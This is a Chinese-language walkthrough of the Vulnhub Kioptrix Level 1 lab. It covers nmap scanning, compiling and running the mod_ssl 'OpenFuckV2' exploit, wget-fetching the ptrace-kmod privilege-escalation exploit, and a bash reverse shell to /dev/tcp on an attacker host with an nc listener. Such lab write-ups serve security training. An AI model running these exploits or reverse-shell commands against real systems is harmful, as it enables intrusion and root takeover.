【Vulnhub靶场通关】Kioptix Level 1

靶场下载地址

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

一、信息收集

1. 扫存活主机

javascript 复制代码
nmap -sP 192.168.118.0/24 

本机IP 为192.168.118.128

分析得靶机IP为 192.168.118.129

2. 扫全端口

javascript 复制代码
nmap -p- 192.168.118.129 

3. 服务详情扫描

javascript 复制代码
nmap -sV -A 192.168.118.129

发现开放的443端口,其中Apache/1.3.20,版本过低,可查找mod_ssl 漏洞

二、漏洞发现

1. 查找 mod_ssl 漏洞

javascript 复制代码
searchsploit mod_ssl

2. 漏洞版本

https://www.exploit-db.com(漏洞库)中查找,使用最新漏洞利用:

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) unix/remote/47080.c

三、漏洞利用

1. 获取漏洞脚本

漏洞路径查询,当前路径查询,把脚本拷贝到当前桌面

bash 复制代码
locate unix/remote/47080.c

pwd

cp /usr/share/exploitdb/exploits/unix/remote/47080.c /root/Desktop

查看此脚本文件

发现需要安装相关依赖,编译,已给出相关利用指令

2. 使用脚本文件

安装依赖,编译

bash 复制代码
apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

使用脚本文件

bash 复制代码
./文件名     显示文件使用说明

找到对应版本,尝试利用此脚本

bash 复制代码
./47080 0x6b 192.168.233.131 443 -c 40

此时发现已经得到 Shell ,输入 whami 尝试 ,发现只是普通用户

观察发现是 ptrace-kmod.c 文件获取失败

在给出的网址中下载 ptrace-kmod.c 到本地桌面,查看发现此文件为提权脚本文件

四、提权

1. kali 本机下载目标提权脚本

bash 复制代码
kali本机下载目标提权脚本:

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

2. 远程下载

在本地启动HTTP服务器,在目标中下载本地文件 ptrace-kmod.c并编译,然后重新利用漏洞,然后测试发现提权成功,获得root权限。

bash 复制代码
python -m http.server 80

wget 192.168.118.128/ptrace-kmod.c

3. Bash反弹Shell

bash 复制代码
nc -lvvp 6666

bash -i >& /dev/tcp/192.168.118.128/6666 0>&1
相关推荐
博大信息安全7 天前
汽车娱乐信息系统域控制器的网络安全开发方案
渗透测试·汽车网络安全·域控制网络安全·ecu 需求开发·娱乐信息系统安全
IT 青年8 天前
CVE-2020-24557
漏洞
Sugobet8 天前
【安卓][Mac/Windows】永久理论免费 无限ip代理池 - 适合临时快速作战
android·tcp/ip·macos·网络安全·渗透测试·ip代理池·接入点
第十六年盛夏.10 天前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
-曾牛14 天前
PHP 与 MySQL 详解实战入门(1)
android·开发语言·mysql·渗透测试·php·php教程·脚本语言
ALe要立志成为web糕手16 天前
TCP/IP
安全·web安全·网络安全·渗透测试
IT 青年17 天前
CVE-2021-21148
漏洞
小田冲冲冲21 天前
文件包含漏洞
渗透测试
lally.21 天前
HTB TwoMilion
渗透测试
白山云北诗23 天前
漏洞扫描 + 渗透测试:双轮驱动筑牢网络安全防线
网络·安全·web安全·渗透测试·漏洞扫描·安全检测